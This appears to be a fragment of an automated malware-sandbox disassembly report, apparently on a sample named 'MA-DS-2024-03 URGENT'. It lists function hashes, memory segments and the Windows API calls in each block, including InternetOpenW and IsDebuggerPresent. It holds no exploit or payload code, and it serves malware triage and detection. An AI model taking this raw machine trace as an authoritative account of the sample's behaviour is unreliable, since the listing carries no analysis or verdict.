                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                        • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                                        • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                        • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                                        APIs
                                                        • _memset.LIBCMT ref: 00462911
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: bf030040d580581949e15b20af0d453f6f6e00ffbb8a4a7429e9bb56af3c6344
                                                        • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                                        • Opcode Fuzzy Hash: bf030040d580581949e15b20af0d453f6f6e00ffbb8a4a7429e9bb56af3c6344
                                                        • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                        • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                                        • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                        • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                                        APIs
                                                          • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                          • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                          • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                        • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                        • GetSysColor.USER32(00000012), ref: 00486C8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                        • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                                        • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                        • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                        Strings
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        APIs
                                                        • _memset.LIBCMT ref: 00462A22
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                        Strings
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                        Strings
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        • _wcscat.LIBCMT ref: 00444CB7
                                                        Strings
                                                        Similarity
                                                        • API ID: FullNamePath_memmove_wcscat
                                                        • String ID: SL
                                                        • API String ID: 257928180-181245872
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0045C534
                                                          • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                          • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                          • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                        • VariantClear.OLEAUT32(?), ref: 0045C556
                                                        Strings
                                                        Similarity
                                                        • API ID: Variant$Init$ClearCopy_memmove
                                                        • String ID: d}K
                                                        • API String ID: 2932060187-3405784397
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        APIs
                                                          • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                          • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 3158253471-631824599